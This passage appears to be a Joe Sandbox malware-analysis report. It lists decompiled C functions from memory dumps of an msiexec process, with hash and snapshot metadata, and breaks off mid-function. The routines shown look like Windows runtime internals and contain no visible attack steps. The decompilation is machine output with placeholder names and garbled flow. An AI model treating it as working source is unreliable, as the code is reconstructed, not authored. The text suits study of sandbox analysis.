                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b58f74edd988c0a0ee38e2e95cef39c46b814d3a47638cd45099da75a44bf607
                              • Instruction ID: 59a5afd8998e53942e5328871c0450d2932c2dfdf2681516cb05140b8b5a87ec
                              • Opcode Fuzzy Hash: b58f74edd988c0a0ee38e2e95cef39c46b814d3a47638cd45099da75a44bf607
                              • Instruction Fuzzy Hash: D431B171A00219ABDF149F64CD41ABFB7B9FF44704B01446AF902EB290E774B911DBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E04D48EC7(void* __ecx, void* __edx) {
                              				signed int _v8;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				char* _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				signed int* _v44;
                              				intOrPtr _v48;
                              				intOrPtr _v52;
                              				intOrPtr _v56;
                              				signed int* _v60;
                              				intOrPtr _v64;
                              				intOrPtr _v68;
                              				intOrPtr _v72;
                              				char* _v76;
                              				intOrPtr _v80;
                              				signed int _v84;
                              				intOrPtr _v88;
                              				intOrPtr _v92;
                              				intOrPtr _v96;
                              				intOrPtr _v100;
                              				intOrPtr _v104;
                              				signed int* _v108;
                              				char _v140;
                              				signed int _v144;
                              				signed int _v148;
                              				intOrPtr _v152;
                              				char _v156;
                              				intOrPtr _v160;
                              				char _v164;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t67;
                              				intOrPtr _t70;
                              				void* _t71;
                              				void* _t72;
                              				signed int _t73;
                              
                              				_t69 = __edx;
                              				_v8 =  *0x4dfd360 ^ _t73;
                              				_t48 =  *[fs:0x30];
                              				_t72 = __edx;
                              				_t71 = __ecx;
                              				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                              					_t48 = E04D34E70(0x4df86e4, 0x4d49490, 0, 0);
                              					if( *0x4df53e8 > 5 && E04D48F33(0x4df53e8, 0, 0x2000) != 0) {
                              						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                              						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                              						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                              						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                              						_v108 =  &_v84;
                              						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                              						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                              						_v76 =  &_v156;
                              						_t70 = 8;
                              						_v60 =  &_v144;
                              						_t67 = 4;
                              						_v44 =  &_v148;
                              						_v152 = 0;
                              						_v160 = 0;
                              						_v104 = 0;
                              						_v100 = 2;
                              						_v96 = 0;
                              						_v88 = 0;
                              						_v80 = 0;
                              						_v72 = 0;
                              						_v68 = _t70;
                              						_v64 = 0;
                              						_v56 = 0;
                              						_v52 = 0x4df53e8;
                              						_v48 = 0;
                              						_v40 = 0;
                              						_v36 = 0x4df53e8;
                              						_v32 = 0;
                              						_v28 =  &_v164;
                              						_v24 = 0;
                              						_v20 = _t70;
                              						_v16 = 0;
                              						_t69 = 0x4cebc46;
                              						_t48 = E04D87B9C(0x4df53e8, 0x4cebc46, _t67, 0x4df53e8, _t70,  &_v140);
                              					}
                              				}
                              				return E04D4B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f51df401e1fe8809c24c595d77c55060fc7d09088c4b62b302a3ed2e72356e2c
                              • Instruction ID: b31634b4ef61796febc26880f016c1041d8f5e344a9a5edd7b42217ca42993ca
                              • Opcode Fuzzy Hash: f51df401e1fe8809c24c595d77c55060fc7d09088c4b62b302a3ed2e72356e2c
                              • Instruction Fuzzy Hash: CE41A2B1D003189FDB20DFAAD980AADFBF4FB48314F5041AEE549A7200E774AA44CF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 58%
                              			E04D44A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				signed int* _v12;
                              				char _v13;
                              				signed int _v16;
                              				char _v21;
                              				signed int* _v24;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t29;
                              				signed int* _t32;
                              				signed int* _t41;
                              				signed int _t42;
                              				void* _t43;
                              				intOrPtr* _t51;
                              				void* _t52;
                              				signed int _t53;
                              				signed int _t58;
                              				void* _t59;
                              				signed int _t60;
                              				signed int _t62;
                              
                              				_t49 = __edx;
                              				_t62 = (_t60 & 0xfffffff8) - 0xc;
                              				_t26 =  *0x4dfd360 ^ _t62;
                              				_v8 =  *0x4dfd360 ^ _t62;
                              				_t41 = __ecx;
                              				_t51 = __edx;
                              				_v12 = __ecx;
                              				if(_a4 == 0) {
                              					if(_a8 != 0) {
                              						goto L1;
                              					}
                              					_v13 = 1;
                              					E04D22280(_t26, 0x4df8608);
                              					_t58 =  *_t41;
                              					if(_t58 == 0) {
                              						L11:
                              						E04D1FFB0(_t41, _t51, 0x4df8608);
                              						L2:
                              						 *0x4dfb1e0(_a4, _a8);
                              						_t42 =  *_t51();
                              						if(_t42 == 0) {
                              							_t29 = 0;
                              							L5:
                              							_pop(_t52);
                              							_pop(_t59);
                              							_pop(_t43);
                              							return E04D4B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                              						}
                              						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                              						if(_v21 != 0) {
                              							_t53 = 0;
                              							E04D22280(_t28, 0x4df8608);
                              							_t32 = _v24;
                              							if( *_t32 == _t58) {
                              								 *_t32 = _t42;
                              								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                              								if(_t58 != 0) {
                              									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                              									asm("sbb edi, edi");
                              									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                              								}
                              							}
                              							E04D1FFB0(_t42, _t53, 0x4df8608);
                              							if(_t53 != 0) {
                              								L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                              							}
                              						}
                              						_t29 = _t42;
                              						goto L5;
                              					}
                              					if( *((char*)(_t58 + 0x40)) != 0) {
                              						L10:
                              						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                              						E04D1FFB0(_t41, _t51, 0x4df8608);
                              						_t29 = _t58;
                              						goto L5;
                              					}
                              					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                              					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                              						goto L11;
                              					}
                              					goto L10;
                              				}
                              				L1:
                              				_v13 = 0;
                              				_t58 = 0;
                              				goto L2;
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a18a74734eb825d1921fc96fd508e7ccc8c80658d3175118b48aab8055f7ff71
                              • Instruction ID: 9d3184064156c4cc0c631218e184be4d90b12137939050dd57cfff7e80904e0f
                              • Opcode Fuzzy Hash: a18a74734eb825d1921fc96fd508e7ccc8c80658d3175118b48aab8055f7ff71
                              • Instruction Fuzzy Hash: A33102323052509BD731AF14CD42B2AB7A5FFC1718F050929E9964B280D770F884DB96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 74%
                              			E04D3E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                              				intOrPtr* _v0;
                              				signed char _v4;
                              				signed int _v8;
                              				void* __ecx;
                              				void* __ebp;
                              				void* _t37;
                              				intOrPtr _t38;
                              				signed int _t44;
                              				signed char _t52;
                              				void* _t54;
                              				intOrPtr* _t56;
                              				void* _t58;
                              				char* _t59;
                              				signed int _t62;
                              
                              				_t58 = __edx;
                              				_push(0);
                              				_push(4);
                              				_push( &_v8);
                              				_push(0x24);
                              				_push(0xffffffff);
                              				if(E04D49670() < 0) {
                              					L04D5DF30(_t54, _t58, _t35);
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					asm("int3");
                              					_push(_t54);
                              					_t52 = _v4;
                              					if(_t52 > 8) {
                              						_t37 = 0xc0000078;
                              					} else {
                              						_t38 =  *0x4df7b9c; // 0x0
                              						_t62 = _t52 & 0x000000ff;
                              						_t59 = L04D24620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                              						if(_t59 == 0) {
                              							_t37 = 0xc0000017;
                              						} else {
                              							_t56 = _v0;
                              							 *(_t59 + 1) = _t52;
                              							 *_t59 = 1;
                              							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                              							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                              							_t44 = _t62 - 1;
                              							if(_t44 <= 7) {
                              								switch( *((intOrPtr*)(_t44 * 4 +  &M04D3E810))) {
                              									case 0:
                              										L6:
                              										 *((intOrPtr*)(_t59 + 8)) = _a8;
                              										goto L7;
                              									case 1:
                              										L13:
                              										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                              										goto L6;
                              									case 2:
                              										L12:
                              										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                              										goto L13;
                              									case 3:
                              										L11:
                              										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                              										goto L12;
                              									case 4:
                              										L10:
                              										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                              										goto L11;
                              									case 5:
                              										L9:
                              										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                              										goto L10;
                              									case 6:
                              										L17:
                              										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                              										goto L9;
                              									case 7:
                              										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                              										goto L17;
                              								}
                              							}
                              							L7:
                              							 *_a40 = _t59;
                              							_t37 = 0;
                              						}
                              					}
                              					return _t37;
                              				} else {
                              					_push(0x20);
                              					asm("ror eax, cl");
                              					return _a4 ^ _v8;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: caedb1ca2b5436383595cc492dd97c84989efc68e3dcaa7d1c107508c32a28a3
                              • Instruction ID: 431344b2dd8f466c88493d5080b898e6c97068b1fa11a57aa364be01d52cb2b7
                              • Opcode Fuzzy Hash: caedb1ca2b5436383595cc492dd97c84989efc68e3dcaa7d1c107508c32a28a3
                              • Instruction Fuzzy Hash: B9316DB5A14249EFD744CF68D841B9AB7E4FB59314F148296F904CB381E631FD80CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 67%
                              			E04D3BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				void* __ebx;
                              				void* __edi;
                              				intOrPtr _t22;
                              				intOrPtr* _t41;
                              				intOrPtr _t51;
                              
                              				_t51 =  *0x4df6100; // 0x4b
                              				_v12 = __edx;
                              				_v8 = __ecx;
                              				if(_t51 >= 0x800) {
                              					L12:
                              					return 0;
                              				} else {
                              					goto L1;
                              				}
                              				while(1) {
                              					L1:
                              					_t22 = _t51;
                              					asm("lock cmpxchg [ecx], edx");
                              					if(_t51 == _t22) {
                              						break;
                              					}
                              					_t51 = _t22;
                              					if(_t22 < 0x800) {
                              						continue;
                              					}
                              					goto L12;
                              				}
                              				E04D22280(0xd, 0x185cf1a0);
                              				_t41 =  *0x4df60f8; // 0x0
                              				if(_t41 != 0) {
                              					 *0x4df60f8 =  *_t41;
                              					 *0x4df60fc =  *0x4df60fc + 0xffff;
                              				}
                              				E04D1FFB0(_t41, 0x800, 0x185cf1a0);
                              				if(_t41 != 0) {
                              					L6:
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                              					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                              					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                              					do {
                              						asm("lock xadd [0x4df60f0], ax");
                              						 *((short*)(_t41 + 0x34)) = 1;
                              					} while (1 == 0);
                              					goto L8;
                              				} else {
                              					_t41 = L04D24620(0x4df6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                              					if(_t41 == 0) {
                              						L11:
                              						asm("lock dec dword [0x4df6100]");
                              						L8:
                              						return _t41;
                              					}
                              					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                              					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                              					if(_t41 == 0) {
                              						goto L11;
                              					}
                              					goto L6;
                              				}
                              			}











                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0a37e2dba58ec9fb947180ee239fd22cc40c9e34c54f8528297350d9eb8dc030
                              • Instruction ID: f215a90f37e327b7ba2317c8dd2238d2702b2e43388fc3b90ef6a952fe82de6b
                              • Opcode Fuzzy Hash: 0a37e2dba58ec9fb947180ee239fd22cc40c9e34c54f8528297350d9eb8dc030
                              • Instruction Fuzzy Hash: FF31EE32A006559BDB21DF68E4807A673B4FF18316F15007AED49DB306EB79FD068B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E04D31DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                              				char _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				intOrPtr* _v20;
                              				void* _t22;
                              				char _t23;
                              				void* _t36;
                              				intOrPtr _t42;
                              				intOrPtr _t43;
                              
                              				_v12 = __ecx;
                              				_t43 = 0;
                              				_v20 = __edx;
                              				_t42 =  *__edx;
                              				 *__edx = 0;
                              				_v16 = _t42;
                              				_push( &_v8);
                              				_push(0);
                              				_push(0);
                              				_push(6);
                              				_push(0);
                              				_push(__ecx);
                              				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                              				_push(_t36);
                              				_t22 = E04D2F460();
                              				if(_t22 < 0) {
                              					if(_t22 == 0xc0000023) {
                              						goto L1;
                              					}
                              					L3:
                              					return _t43;
                              				}
                              				L1:
                              				_t23 = _v8;
                              				if(_t23 != 0) {
                              					_t38 = _a4;
                              					if(_t23 >  *_a4) {
                              						_t42 = L04D24620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                              						if(_t42 == 0) {
                              							goto L3;
                              						}
                              						_t23 = _v8;
                              					}
                              					_push( &_v8);
                              					_push(_t23);
                              					_push(_t42);
                              					_push(6);
                              					_push(_t43);
                              					_push(_v12);
                              					_push(_t36);
                              					if(E04D2F460() < 0) {
                              						if(_t42 != 0 && _t42 != _v16) {
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                              						}
                              						goto L3;
                              					}
                              					 *_v20 = _t42;
                              					 *_a4 = _v8;
                              				}
                              				_t43 = 1;
                              				goto L3;
                              			}













                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                              • Instruction ID: 27deb414ec64b3112c9a7818474bdadd24959197961038a703c8347ed0d7bc74
                              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                              • Instruction Fuzzy Hash: 14217C7260011AFFD721CF9ACD80EAEBBB9FF85785F114065E905A7210DA35BE01DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E04D09100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                              				signed int _t53;
                              				signed int _t56;
                              				signed int* _t60;
                              				signed int _t63;
                              				signed int _t66;
                              				signed int _t69;
                              				void* _t70;
                              				intOrPtr* _t72;
                              				void* _t78;
                              				void* _t79;
                              				signed int _t80;
                              				intOrPtr _t82;
                              				void* _t85;
                              				void* _t88;
                              				void* _t89;
                              
                              				_t84 = __esi;
                              				_t70 = __ecx;
                              				_t68 = __ebx;
                              				_push(0x2c);
                              				_push(0x4ddf6e8);
                              				E04D5D0E8(__ebx, __edi, __esi);
                              				 *((char*)(_t85 - 0x1d)) = 0;
                              				_t82 =  *((intOrPtr*)(_t85 + 8));
                              				if(_t82 == 0) {
                              					L4:
                              					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                              						E04DD88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                              					}
                              					L5:
                              					return E04D5D130(_t68, _t82, _t84);
                              				}
                              				_t88 = _t82 -  *0x4df86c0; // 0x30507b0
                              				if(_t88 == 0) {
                              					goto L4;
                              				}
                              				_t89 = _t82 -  *0x4df86b8; // 0x0
                              				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                              					goto L4;
                              				} else {
                              					E04D22280(_t82 + 0xe0, _t82 + 0xe0);
                              					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                              					__eflags =  *((char*)(_t82 + 0xe5));
                              					if(__eflags != 0) {
                              						E04DD88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                              						goto L12;
                              					} else {
                              						__eflags =  *((char*)(_t82 + 0xe4));
                              						if( *((char*)(_t82 + 0xe4)) == 0) {
                              							 *((char*)(_t82 + 0xe4)) = 1;
                              							_push(_t82);
                              							_push( *((intOrPtr*)(_t82 + 0x24)));
                              							E04D4AFD0();
                              						}
                              						while(1) {
                              							_t60 = _t82 + 8;
                              							 *(_t85 - 0x2c) = _t60;
                              							_t68 =  *_t60;
                              							_t80 = _t60[1];
                              							 *(_t85 - 0x28) = _t68;
                              							 *(_t85 - 0x24) = _t80;
                              							while(1) {
                              								L10:
                              								__eflags = _t80;
                              								if(_t80 == 0) {
                              									break;
                              								}
                              								_t84 = _t68;
                              								 *(_t85 - 0x30) = _t80;
                              								 *(_t85 - 0x24) = _t80 - 1;
                              								asm("lock cmpxchg8b [edi]");
                              								_t68 = _t84;
                              								 *(_t85 - 0x28) = _t68;
                              								 *(_t85 - 0x24) = _t80;
                              								__eflags = _t68 - _t84;
                              								_t82 =  *((intOrPtr*)(_t85 + 8));
                              								if(_t68 != _t84) {
                              									continue;
                              								}
                              								__eflags = _t80 -  *(_t85 - 0x30);
                              								if(_t80 !=  *(_t85 - 0x30)) {
                              									continue;
                              								}
                              								__eflags = _t80;
                              								if(_t80 == 0) {
                              									break;
                              								}
                              								_t63 = 0;
                              								 *(_t85 - 0x34) = 0;
                              								_t84 = 0;
                              								__eflags = 0;
                              								while(1) {
                              									 *(_t85 - 0x3c) = _t84;
                              									__eflags = _t84 - 3;
                              									if(_t84 >= 3) {
                              										break;
                              									}
                              									__eflags = _t63;
                              									if(_t63 != 0) {
                              										L40:
                              										_t84 =  *_t63;
                              										__eflags = _t84;
                              										if(_t84 != 0) {
                              											_t84 =  *(_t84 + 4);
                              											__eflags = _t84;
                              											if(_t84 != 0) {
                              												 *0x4dfb1e0(_t63, _t82);
                              												 *_t84();
                              											}
                              										}
                              										do {
                              											_t60 = _t82 + 8;
                              											 *(_t85 - 0x2c) = _t60;
                              											_t68 =  *_t60;
                              											_t80 = _t60[1];
                              											 *(_t85 - 0x28) = _t68;
                              											 *(_t85 - 0x24) = _t80;
                              											goto L10;
                              										} while (_t63 == 0);
                              										goto L40;
                              									}
                              									_t69 = 0;
                              									__eflags = 0;
                              									while(1) {
                              										 *(_t85 - 0x38) = _t69;
                              										__eflags = _t69 -  *0x4df84c0;
                              										if(_t69 >=  *0x4df84c0) {
                              											break;
                              										}
                              										__eflags = _t63;
                              										if(_t63 != 0) {
                              											break;
                              										}
                              										_t66 = E04DD9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                              										__eflags = _t66;
                              										if(_t66 == 0) {
                              											_t63 = 0;
                              											__eflags = 0;
                              										} else {
                              											_t63 = _t66 + 0xfffffff4;
                              										}
                              										 *(_t85 - 0x34) = _t63;
                              										_t69 = _t69 + 1;
                              									}
                              									_t84 = _t84 + 1;
                              								}
                              								__eflags = _t63;
                              							}
                              							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                              							 *((char*)(_t82 + 0xe5)) = 1;
                              							 *((char*)(_t85 - 0x1d)) = 1;
                              							L12:
                              							 *(_t85 - 4) = 0xfffffffe;
                              							E04D0922A(_t82);
                              							_t53 = E04D27D50();
                              							__eflags = _t53;
                              							if(_t53 != 0) {
                              								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              							} else {
                              								_t56 = 0x7ffe0386;
                              							}
                              							__eflags =  *_t56;
                              							if( *_t56 != 0) {
                              								_t56 = E04DD8B58(_t82);
                              							}
                              							__eflags =  *((char*)(_t85 - 0x1d));
                              							if( *((char*)(_t85 - 0x1d)) != 0) {
                              								__eflags = _t82 -  *0x4df86c0; // 0x30507b0
                              								if(__eflags != 0) {
                              									__eflags = _t82 -  *0x4df86b8; // 0x0
                              									if(__eflags == 0) {
                              										_t79 = 0x4df86bc;
                              										_t72 = 0x4df86b8;
                              										goto L18;
                              									}
                              									__eflags = _t56 | 0xffffffff;
                              									asm("lock xadd [edi], eax");
                              									if(__eflags == 0) {
                              										E04D09240(_t68, _t82, _t82, _t84, __eflags);
                              									}
                              								} else {
                              									_t79 = 0x4df86c4;
                              									_t72 = 0x4df86c0;
                              									L18:
                              									E04D39B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                              								}
                              							}
                              							goto L5;
                              						}
                              					}
                              				}
                              			}



















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bf765aded13f370ad2db3f8be4f31bf751dec5a979ddb9034d0237d59fcb6103
                              • Instruction ID: 63fa848a7e64bdb1e946c2593ac3997703051f556a662057760b9e9e718f1079
                              • Opcode Fuzzy Hash: bf765aded13f370ad2db3f8be4f31bf751dec5a979ddb9034d0237d59fcb6103
                              • Instruction Fuzzy Hash: BD31B0B1B01644DFEB21EF68C4A8BACBBF1FB49354F18C199D41567282C374B980DB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 53%
                              			E04D20050(void* __ecx) {
                              				signed int _v8;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				intOrPtr* _t30;
                              				intOrPtr* _t31;
                              				signed int _t34;
                              				void* _t40;
                              				void* _t41;
                              				signed int _t44;
                              				intOrPtr _t47;
                              				signed int _t58;
                              				void* _t59;
                              				void* _t61;
                              				void* _t62;
                              				signed int _t64;
                              
                              				_push(__ecx);
                              				_v8 =  *0x4dfd360 ^ _t64;
                              				_t61 = __ecx;
                              				_t2 = _t61 + 0x20; // 0x20
                              				E04D39ED0(_t2, 1, 0);
                              				_t52 =  *(_t61 + 0x8c);
                              				_t4 = _t61 + 0x8c; // 0x8c
                              				_t40 = _t4;
                              				do {
                              					_t44 = _t52;
                              					_t58 = _t52 & 0x00000001;
                              					_t24 = _t44;
                              					asm("lock cmpxchg [ebx], edx");
                              					_t52 = _t44;
                              				} while (_t52 != _t44);
                              				if(_t58 == 0) {
                              					L7:
                              					_pop(_t59);
                              					_pop(_t62);
                              					_pop(_t41);
                              					return E04D4B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                              				}
                              				asm("lock xadd [esi], eax");
                              				_t47 =  *[fs:0x18];
                              				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                              				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                              				if(_t30 != 0) {
                              					if( *_t30 == 0) {
                              						goto L4;
                              					}
                              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              					L5:
                              					if( *_t31 != 0) {
                              						_t18 = _t61 + 0x78; // 0x78
                              						E04DD8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                              					}
                              					_t52 =  *(_t61 + 0x5c);
                              					_t11 = _t61 + 0x78; // 0x78
                              					_t34 = E04D39702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                              					_t24 = _t34 | 0xffffffff;
                              					asm("lock xadd [esi], eax");
                              					if((_t34 | 0xffffffff) == 0) {
                              						 *0x4dfb1e0(_t61);
                              						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                              					}
                              					goto L7;
                              				}
                              				L4:
                              				_t31 = 0x7ffe0386;
                              				goto L5;
                              			}

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 38a51bd81de5e9abaab201bc37e33f3d073b42eab39b0d3a86151902e8273b11
                              • Instruction ID: 7c0f842b5a217116134e2ec1fd42725967072e88a76bc639d0247a406195813d
                              • Opcode Fuzzy Hash: 38a51bd81de5e9abaab201bc37e33f3d073b42eab39b0d3a86151902e8273b11
                              • Instruction Fuzzy Hash: 62317A31701A048FE722CF28CA44B9AB3E5FF88718F144569E59A87B90EA75B801CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E04D86C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                              				signed short* _v8;
                              				signed char _v12;
                              				void* _t22;
                              				signed char* _t23;
                              				intOrPtr _t24;
                              				signed short* _t44;
